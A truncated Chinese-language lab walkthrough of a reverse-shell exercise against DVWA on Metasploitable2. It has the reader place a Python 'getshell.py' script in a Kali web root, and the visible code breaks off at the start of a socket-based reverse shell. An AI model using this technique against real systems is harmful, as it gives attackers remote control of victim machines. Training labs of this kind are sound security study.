【DVWA】反弹shell实验

反弹shell实验 实验环境:metasploitable2;dvwa-linux版html 操做过程 进入kali的web服务根目录/var/www/html,写入getshell.py的python程序python #leafpad getshell.py import socket,subprocess,os s=socket. socket( socket.AF_INET , socke
相关文章
相关标签/搜索